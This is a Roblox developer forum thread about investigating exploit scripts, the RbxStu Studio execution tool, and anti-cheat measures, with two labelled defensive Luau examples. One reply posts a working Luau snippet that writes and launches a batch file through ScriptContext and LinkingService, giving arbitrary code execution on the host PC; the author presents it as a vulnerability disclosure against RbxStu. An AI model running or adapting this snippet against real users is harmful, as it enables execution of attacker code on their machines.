Provide an exploit investigation environment

My game was recently targeted by an exploit that allowed users to automatically complete certain game-wide actions that sped up the process for acquiring an in-game UGC item. A YouTube video got 2,000 views over a matter of hours, and hundreds of players were exploiting it.

I was able to implement and push a fix as well as detecting all users using it within 3-4 hours of the exploit being released (I was asleep the first 3 hours or so), and since then I have tracked down the GitHub repository of the bad actor, with exploits for many games as well as my own, and deobfuscated what I can manage to, with not much success.

In this case, I benefited massively from having very intimate knowledge of exactly how my game’s networking works. On seeing the exploit it was immediately obvious to me what the resolution would need to be because of that, and I was able to very quickly push out a fix. However, still to this point I have absolutely no knowledge of what the script itself does, I haven’t seen it, I got as far as deobfuscating and reverse engineering enough to find a single loadstring that brought in the UI Library, but not the actual script logic itself. With this instance I can guess pretty accurately what the script is doing, and I’m confident in most cases I could do the same as I’m always going to have a better understanding of my game than a bad actor does.

It is not the obfuscation making it difficult, it's Roblox's own limits on the permissions of developers in Studio

Here is my issue. Bad actors and the players who make use of these exploits have more access than developers themselves. They are free to access CoreScripts, CoreGui, essentially they have complete control over the game client as Roblox does. We as developers do not get the same special treatment.

What stopped me investigating further was that at every turn I was coming up against Roblox’s own permissioning blocking me. Not only do I have to deobfuscate the script, I have to somehow try and find alternatives to the services the script is using that I do have permissions for to test it, so that I can monitor what the script is doing, and in most cases there is no suitable alternative.

I feel that Roblox has, nobly but misguidedly, taken the weight of exploit prevention on their own shoulders, when this is simply not a realistic goal. No matter how much client detection is done on Roblox’s end, it will never be enough to prevent exploiters from running code clientside. In fact I feel that the recent hype around the improvements to anti-exploit has had a negative effect and caused developers to become more complacent than ever, believing that Roblox will take care of the anti-exploit side.

Roblox need to offer the tools developers need to take exploit detection and prevention into their own hands, rather than restricting developers

A developer will always have a better idea of what’s going on in their game code than Roblox does. Universal anti-exploit can only work to a certain extent, the endless nuances of individual experiences mean that there will always be areas that are not covered.

While I am very happy to see Roblox taking the issue seriously on their end, they must understand that this is not a problem that can be addressed on just one side. I believe the standard of safety and fairness will be improved much more significantly by handing the power to developers than it is through platform-wide detection.

It is well known that there are multiple programs that offer this level of access. Developers currently have very few options to test with anything like that level of privilege, and the ways that are available come with inherent and very real risk. Running exploit code as a local plugin could potentially give a bad actor unfettered access to your game code if it is written to detect that it’s running in that environment. Developers are obviously not expected to download or subscribe to one of these programs themselves, either; I imagine this would be a bannable offense.

We are fighting on the losing side, and it’s not because we’re not able or motivated, it’s because Roblox is treating developers in the same way it treats bad actors, only we are trying to stick by the rules and they are not. The current state of things puts developers and players at risk.

A very high level suggestion

Roblox knows better than me how this can be done in a way that has a net positive impact. Though I feel that even in the worst case, where such a service was used by exploiters themselves to develop exploits, it at least puts us on an equal playing field with them - and I think we would win. We are the people who spend years learning and hundreds or thousands of hours creating experiences, the people who write these exploits are far less capable.

A sandboxed environment where we can run exploit code against our experiences, or simply the ability to use sensitive services in a testing environment would put us there. Such a program could be invite only, it could be heavily monitored, but it needs to exist.

62 Likes

The trouble is that it’s hard for us to differentiate between the two. In practice, we cannot, since Roblox users as a group include developers and bad actors. Even if we facilitated privileged execution on Studio for specific developers, this could feasibly be abused by bad actors in phishing-style campaigns.

This is a scenario in which I think case-specific solutions and approaches from within the developer community are more appropriate. It would be a huge risk for us to facilitate any of this on our end – a risk we cannot stomach.

23 Likes

just white-list studio entirely /s

13 Likes

I appreciate the reply and I understand the difficulty of this, but I do feel that there has to be an approach that can give us more insight into how our games are being abused. One example of this could be highlighting specific remote events or attack vectors used by exploits detected by Roblox. I assume Roblox has some level of clientside monitoring and does detect the use of some exploits beyond a reasonable doubt (as has to be the case for moderation action).

To prevent this being used to reverse engineer or work against Roblox’s detection itself, it could be obscured away from specific exploits or users and instead be as simple as detecting unusual activity on network events and telling the developer about this spike or pattern change.

I understand that much of what would be needed is quite complex to go about but I think an overall approach of permissioning developers to access more insights into exploiter activity based on a Roblox → Developer model where this only happens when automated systems detect unusual activity (activity Roblox would not have the certainty to penalise but doesn’t look natural) could be the beginning of a direction that doesn’t give free universal access to these tools.

The best solution for developers isn’t the only solution and I think all developers understand that it has to be balanced and achievable. Server-side only detection on remotes could be a start that doesn’t require clientside access. The best possible scenario would be that Roblox is able to take an approach similar to antivirus companies, where automated systems detect unusual behaviour with a similar pattern across experiences, and potentially in this case provide the developer with some kind of reproduction environment: from as simple as the trail of events that follow that pattern, to the higher end where, if possible, Roblox is able to offer the developer a sandboxed environment for that specific exploit to reproduce its effects.

16 Likes

There are some open source tools that you can use to test out the integrity of your game’s security via Studio, the most notable one being RbxStu, which is essentially an exploit but for Studio (it’s against ToS to modify Studio but it’s not really enforced in this case as it’s beneficial to developers, and also they do not have any anti-cheat on Studio so you can use it without worry). Or if you’re not comfortable and/or experienced enough to try that out, I’d be more than happy to assist you with your issue via PMs; I have lots of experience dealing with exploiters and securing games.

18 Likes

Appreciate you letting me know about the plugin, I’ll have a look and if it’s what I think it is it likely helps with pentesting to preemptively find potential attack vectors, which is certainly useful but in this case it doesn’t resolve the overall issue.

The exploit here was relatively low impact as I’ve taken a strict approach to network security for years now. The real reason it wasn’t completely secure is that a feature which was previously relatively low impact on the game's progression was used as one of the criteria for a UGC quest. I didn’t implement exhaustive server-side checks simply because it didn’t seem necessary for the use of the event at the time in comparison to the performance hit additional validation would cause. In reality this is a trade-off you always have to deal with; this case was exploited because of no proximity check to the object being interacted with.

So, there is no issue with the game currently, but the experience made me realise how helpless I would be in the case that a serious exploit comes along that is much more complex in nature. It also made me realise that this exploit may have been used far into the past before it became this public, and I had no way of knowing this, and there may be others. Even if I discover those in future, the process of fixing the issues in those cases is likely to be a long process without the ability to reverse engineer the exploits themselves.

Edit: Is using something like RbxStu mentioned above allowed? @e_w00k

15 Likes
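The server-side check the post above describes as missing, as an added example in Luau that is not code from the thread or from the poster's game. The RemoteEvent name `InteractEvent`, the `Interactables` folder in Workspace, the 12-stud threshold and the one-second cooldown are all assumptions; the point is that distance and rate are decided from server-side state, never from anything the client sends.

```lua
-- Added example, not from the original thread. Assumed names: a RemoteEvent
-- "InteractEvent" in ReplicatedStorage and a Folder "Interactables" in Workspace.
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Workspace = game:GetService("Workspace")

local InteractEvent = ReplicatedStorage:WaitForChild("InteractEvent") -- assumed
local Interactables = Workspace:WaitForChild("Interactables")          -- assumed

local MAX_DISTANCE = 12   -- studs; assumed, slightly above the client prompt range
local COOLDOWN = 1.0      -- seconds between accepted interactions per player
local lastInteraction = {} -- [Player] = os.clock() of the last accepted call

local function getRootPosition(player)
    local character = player.Character
    local root = character and character:FindFirstChild("HumanoidRootPart")
    return root and root.Position
end

-- Returns true if the request is acceptable, otherwise false and a reason string.
local function validateInteract(player, target)
    -- Type check first: an exploiter can pass any value through the remote.
    if typeof(target) ~= "Instance" or not target:IsA("BasePart") then
        return false, "bad-target-type"
    end
    -- Only objects the server itself placed as interactable are eligible.
    if not target:IsDescendantOf(Interactables) then
        return false, "not-interactable"
    end
    local position = getRootPosition(player)
    if not position then
        return false, "no-character"
    end
    -- Proximity check, using the server's view of the character position.
    if (position - target.Position).Magnitude > MAX_DISTANCE then
        return false, "too-far"
    end
    -- Cooldown: a script cannot complete the action faster than a human could.
    local now = os.clock()
    local last = lastInteraction[player]
    if last and (now - last) < COOLDOWN then
        return false, "too-fast"
    end
    lastInteraction[player] = now
    return true, nil
end

InteractEvent.OnServerEvent:Connect(function(player, target)
    local ok, reason = validateInteract(player, target)
    if not ok then
        -- Log and drop silently; the client is told nothing about which check fired.
        warn(("rejected interact from %s: %s"):format(player.Name, reason))
        return
    end
    -- Apply the game effect here; quest progress is only advanced from this path.
    print(player.Name, "interacted with", target.Name)
end)

Players.PlayerRemoving:Connect(function(player)
    lastInteraction[player] = nil
end)
```

The distance check costs one vector subtraction per call, so the performance argument in the post above mostly applies to heavier validation; a rejected call is also a useful signal to feed into a silent flagging system rather than something to report back to the client.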

Ultimately I don’t think we can encourage or endorse the use of external tooling like RbxStu, but I can say we have absolutely no plans as of this post to police Studio with anticheat. So, as of now it’s possible to use tools like these without concern of the usage of these being moderated/detected.

Obviously outside of Studio this is a different story, and also this should not be taken as blanket permission to use tools like these since this breaks our ToS. All I can say is there’s no anticheat in Studio and no plans to add it there as of now.

21 Likes

Whilst I created RbxStu for the purposes of pentesting your own games, it is meant really to execute untrusted exploiter code. As such I didn’t want to risk some things; this is why things like the UNC IO library are NOT in, and might never be in. I wanted to avoid as much as possible implementing vulnerable things, but it is just really impossible, as an exploit environment like this has primitives like game:HttpGet and hookfunction that allow you to break out of the sandbox easily and break a game’s entire integrity. Whilst I tried to secure some of the functions you may have available at high contexts, it is still risky to run RbxStu until I do either of two things:

1 - Close source

Make RbxStu closed source, how it was originally going to be. This completely stops knowledgeable exploiters from looking through the code and exploiting vulnerabilities that, despite being clear to them, were not to me. However, this is unfeasible for many reasons.

2 - Open source, but complete rewrite

Continue RbxStu as an open source project, but rewrite it from scratch, something like a V2, with better structure overall, and perhaps completely automatic updating, as Roblox Studio does not have any aggressive protections like shuffling structs.

Whilst RbxStu was never made to cause damage to Roblox as a platform at any point, and I haven’t heard of it much more than from some friends using it to patch scripts or for anti-tamper/anti-cheat development for their games (all of this without using any third party tools that might compromise their system, as I provide the source and DLL for you to inject into your Studio if you want to do anything), I try as much as possible to make it easy to find what the script may be using to do anything to the game (including exploit functions). Thanks to RbxStu, me and @shadowmaster940 are working on another project, which for now goes unspecified, but which would virtually be some kind of generic anti-tamper, and that would be open source, but I digress.

It is completely understandable that Roblox does not endorse the tool; it goes directly against their ToS, and they would not want to make an exploiter-like tool either, because when implementing libraries such as io and others, if those are vulnerable, it's not as simple as “it is a third party”: it would be Roblox the one allowing it, not you going out of your way to get external tooling.

(And yes, RbxStu may eventually get a rewrite to be much more stable, but until then it's just too sporadic on what stability refers to, so if you DO choose to use it, bear in mind your Studio will most likely crash, and even then you will have to roll back to an older version, as I haven’t had the time to update the offsets to the latest Studio version.)

16 Likes

I appreciate you replying here. I also think this situation perfectly captures the issue developers face that is part of what I’m trying to highlight generally to the community and perhaps contribute to pushing for change in some way.

Roblox treats all users equally and I have a lot of respect for that approach, I don’t think it should change, it’s one of the core premises the platform was built on and thrives on.

However, it also results in this awful situation developers find themselves in. I, the same as the vast majority of developers, have never written a single line of code with malicious intent in my life. We dedicate our lives to creating these games while we work on them. Exploits can destroy that work. I don’t blame the people who wrote them or Roblox for their existence, I simply want to fix them and prevent them. The people who create them have very little to lose, their livelihoods don’t depend on a single Roblox account, they won’t lose years of work if they’re banned. We will.

I can’t download one of these script executors, I doubt I would be treated any differently by the systems and moderators if detected using one in my own game. What are we supposed to do? Use an old laptop with a VPN and a new account, hoping it doesn’t disconnect and we are grouped in with the people we are trying to fight against? I wouldn’t risk it.

@roalex2008 here is trying to do something good. They should be appreciated for that, but instead they have to constantly worry that what they are working on might go against the ToS. I don’t mean this against any Roblox staff in this thread but against the way things are in general. We don’t feel safe combatting this in the only ways that are really possible and it’s not the exploiters that we are most scared of, it’s Roblox itself.

And I should say that I’m not at all trying to say that all exploits require this, in most cases securing a game from a known or unknown exploit can be done with enough knowledge but it’s just not always the case. I doubt Roblox would be anywhere near as effective at site and engine security if it wasn’t for your ability to reverse engineer known exploits in a privileged sandboxed environment.

14 Likes

Understood.

Another suggestion I would make generally is a program of trusted developers where we can submit exploits we are struggling with to Roblox, perhaps only in extreme/ specific cases based on criteria. If Roblox must keep such an environment private then a developer program like this could centralise efforts against common obfuscation techniques, and provide those staff with continuous insight into the latest methods being used, and give a place for developers and the security team to work together and directly benefit developers at the same time.

The big issue isn’t with fixing an exploit once we know what it’s doing, it’s that these days they are so heavily obfuscated there’s little option but to reverse engineer them to try and figure out what they’re even doing.

13 Likes

I mean, I used to be an exploiter; the fun wears off in games too simply, it's not worth it to exploit at all. The only times I “exploit” now is with auto clickers, and that is on really abusive games with the player, filled with dark patterns that make them unplayable.

Roblox is not particularly looming over me, I’d say. I have said many times I have no problem with taking down RbxStu if any Roblox staff is concerned about it having some repercussion; I’m open to taking it down, archiving/deleting the repo and keeping it for private use only.

Still, some people say “Validation fixes everything!”, and it really does do wonders, but people underestimate the power a client has in games like obbies, for example, where kill bricks can be completely deactivated with some little mangling.

I truly do NOT recommend you use any executor, at ALL. I know some of the owners, they’re good and sometimes fairly goofy, the Solara owner does it for literal learning, which I find amusing, but the problem is, you should not benefit the cheating industry, and if you do, you will end up getting banned eventually, as EVERYTHING that is currently released is detected, and Hyperion will not make any “Ah you’re doing it with good intent” kind of deal, they will whack you straight up, and that is great tbf.

RbxStu is practically a learning project. I took various actual client exploits and just started experimenting with how they implemented custom functions and other deals. The way of getting the state IS unstable, and that really cannot change unless I rewrite it, which I don’t really know when I will.

As a rule of thumb for exploit protection: don’t trust the client, treat your remote inputs as the devil. If you are willing to sacrifice developer experience for security, turn to using something like ByteNet or Zap; they’re net libs that essentially make all your networking go through buffers, and that makes exploiting much tougher when your data goes through remotes because you simply cannot peek in to see what happens. Normally this will fend off most people who just don’t care enough or aren’t determined enough. If you’re worried about your environment being hooked, you can try running some important parts of the game inside of Actor | Documentation - Roblox Creator Hub, which, despite not being an anti-cheat tool per se, makes a whole new Lua VM where the scripts run, making hooking basically impossible unless they have a function called run_on_actor, which allows them to execute code in them. Most fancy games, like Phantom Forces, use actors on their anti-cheat stack for reasons like that.

You can also improve the game by adding delayed bans. Why, you may ask? Delayed bans make it so that if you detect something, it doesn’t scream at the player “I detected you, cheater”; it rather reads to them as “I bypassed this, foolish developer”, but in reality it is just a honeypot, and when they release the detected feature, all the ones who cheated are now detected, flagged and will, eventually, get banned.

18 Likes
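The delayed-ban pattern from the post above, as an added example in Luau that is not code from the thread or from RbxStu. Detections only write a silent flag; a separate ban wave, run much later, acts on flags older than a threshold. The DataStore name `ExploitFlags`, the three-day delay and the `flagPlayer` calling convention are assumptions; `Players:BanAsync` is Roblox's own server-side ban API and only works in a live server, not in Studio play-solo.

```lua
-- Added example, not from the original thread. Assumed: a DataStore named
-- "ExploitFlags" owned by the game, and a three-day delay before acting on a flag.
local DataStoreService = game:GetService("DataStoreService")
local Players = game:GetService("Players")

local flagStore = DataStoreService:GetDataStore("ExploitFlags") -- assumed name
local BAN_DELAY = 3 * 24 * 60 * 60 -- seconds; flags younger than this are left alone

-- Called by server-side detections (a rejected remote, an impossible value, etc.).
-- Records the evidence silently; the player keeps playing, so the exploit author
-- cannot tell which check fired or when.
local function flagPlayer(player, detection)
    local ok, err = pcall(function()
        flagStore:UpdateAsync(tostring(player.UserId), function(old)
            local record = old or { firstSeen = os.time(), hits = {} }
            table.insert(record.hits, { at = os.time(), what = detection })
            return record
        end)
    end)
    if not ok then
        warn("flag write failed for", player.UserId, err)
    end
end

-- Ban wave: run from an admin command or a scheduled script, never per detection.
-- Takes the UserIds to review and returns the ones that were actually banned.
local function runBanWave(userIds)
    local banned = {}
    for _, userId in ipairs(userIds) do
        local ok, record = pcall(flagStore.GetAsync, flagStore, tostring(userId))
        if ok and record and (os.time() - record.firstSeen) >= BAN_DELAY then
            table.insert(banned, userId)
        end
    end
    if #banned > 0 then
        -- Roblox's Players:BanAsync; Duration -1 is permanent.
        Players:BanAsync({
            UserIds = banned,
            ApplyToUniverse = true,
            Duration = -1,
            DisplayReason = "Exploiting",
            PrivateReason = "delayed ban wave; see ExploitFlags record",
        })
    end
    return banned
end

-- Example detection: a client-reported value that cannot be legitimate.
-- The server simply drops the value and flags; no feedback reaches the client.
local function onClientReportedSpeed(player, speed)
    if typeof(speed) ~= "number" or speed > 100 then -- 100 is an assumed ceiling
        flagPlayer(player, "impossible-speed")
        return
    end
end

return {
    flagPlayer = flagPlayer,
    runBanWave = runBanWave,
    onClientReportedSpeed = onClientReportedSpeed,
}
```

Keeping `firstSeen` in the record matters: a wave that bans on the first hit restores the feedback loop the delay was meant to remove, whereas acting only on flags older than the threshold means every cheater who used a detected feature during that window is swept up at once.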

As much as we want to do something about obfuscation, it will never really be “solved”. What you can do is make detections for their UIs; most exploiters use the same UI library, like Rayfield. This allows you to just detect that UI lib and make them unable to do anything about it. Anti-cheat things are mostly @shadowmaster940’s stuff; I’m mostly just playing around and learning myself on the go, which as a side effect resulted in the little experiment I wrote with shadow, which is like a weird general purpose anti-tamper. It can be found on my GitHub as “zoop”, but it's too experimental, and straight up has little to no detections in place to do much to really recommend it. As deobfuscation was really something out of the window, I simply wrote RbxStu, and wrote some cheap and simple “Environment Instrumentation”, as I call it, which just shows me what calls the exploit environment makes, and you can get one or two things from the script that way while trying to replicate exploit behaviour to let it continue. I sadly can not ever see RbxStu in action, as I have never done a game by myself that has gotten other exploiters’ attention.

13 Likes

These library names are incredible 😂😂

I mean, this all sounds great. I will likely check it out, and thanks for the warnings regarding the stability of it. Do you recommend any particular safeguards to put in place to prevent any kind of lasting damage in the worst case from one of these scripts, should they be written maliciously against reverse engineering itself? Is running in a baseplate enough, or do I need to be more careful than that?

14 Likes

I’d probably say running it on a game copy, as in a local place copy, could solve some of the issues relating to security, but then it may act weirdly. The problem is I’m yet to see a script that directly attacks RbxStu, so for now I’m at a loss if it is happening, sadly. That aside.

There are some checks to protect against malicious scripters, as I’d call them. There are metamethod hooks set on the DataModel to prevent indexing services and functions deemed dangerous; if there are bypasses for them, I have not been aware of them. However, when I first had the chance to check the security of RbxStu regarding env stuff, I checked with a script made by someone and it passed all its tests, so you have that as a “Passes Vulnerability Check!” trademark, I suppose, but it’s not enough. When performing HttpGet it will block Discord webhooks, so you’re not logged, for example; in the future I’d like that feature to extend to a list of blocked URLs or something along those lines.

10 Likes

The code below achieves arbitrary code execution in RLua environments with a thread identity higher than 2! Run batch files, powershell files, anything you can think of! In the PC of Roblox Exploiters!

(Works in RbxStu!)

local ScriptContext = game:FindService('ScriptContext')
local LinkingService = game:FindService('LinkingService')

local Code = "@echo off\nstart https://www.roblox.com/users/4497609693/profile"
local Name = "omg.bat"
-- creates an omg.bat file with the code inside it, then returns the path to the batch file
local Path = ScriptContext:SaveScriptProfilingData(Code, Name)

-- opens the bat file resulting in arbitrary code execution
print(LinkingService:OpenUrl(Path)) -- if returned true, successful code execution

1 Like

Alright? I don’t know what you expect me to tell you, honestly. As I said before, I have to rewrite the entire thing either way; surely if you have enough time to find things like this, then you have enough time to do something that benefits it as a whole or make a better version of it, so be my guest.

Beside the point, LinkingService is relatively new; I'd never heard of it. It was practically added a month ago, and coincidentally the last RbxStu commit was ALSO a month ago, shocker. I’m not going to constantly check the update list for services that can be exploited like this, and what you pointed out about identities higher than 2 may not be true, because I'm pretty sure plugins run at higher contexts and they most likely aren’t affected by it, since Roblox 100% wouldn’t allow that behaviour to happen either way…

I’ll update RbxStu to hot fix the vulnerability tomorrow.

I was working on a project, “Drainer Drainer 123”, which is aimed to test almost all vulnerabilities possible in Roblox executors, such as the one made by the very incompetent developer rexi, called Wave. I read this thread at the time that I had that code copied, and I saw that you said “I’m yet to see a script that directly attacks RbxStu”, so I thought why not quickly paste it, lol.

Oh and, I’m pretty sure Plugins run at PluginSecurity which is identity 1. I may be wrong though.

1 Like

Last I checked, PluginSecurity was more than LocalUser (context-wise), and identity-wise I think they were level 5. Either way, Rexi is complete garbage; I once spoke to the guy and he kept insulting my country of origin non-stop, lol.

As for the vulnerability checker, good that you wrote one, because actual true exploits these days aren’t even held to the scrutiny they used to originally have, so in general they’re much more vulnerable. That being said, RbxStu hasn’t updated in a month, and pretty much this service was added a month ago; coincidences are annoying. Either way, good work and thanks for informing about it. I already informed my server about it; I’ll deploy a hotfix for it later tomorrow.

Plugin is indeed 5

The security of exploits fell off significantly since Synapse’s departure; all of the biggest nobodies in the community have but a clue of how to properly secure their exploits.

Wave is a great example of this, there are multiple unpatched RCE’s, multiple detection methods, no clue how they expect to remain undetected from Hyperion if they can’t even remain undetected from game developers.

Solara is obviously a little harder; they’re external, so their custom environment is non-existent, though you can still do the good ol’ PreloadAsync attacks on the stupid drawing library they use.

Anyways.

If you’re a game developer and still have issues with these exploits, feel free to DM me for a detection or two

4 Likes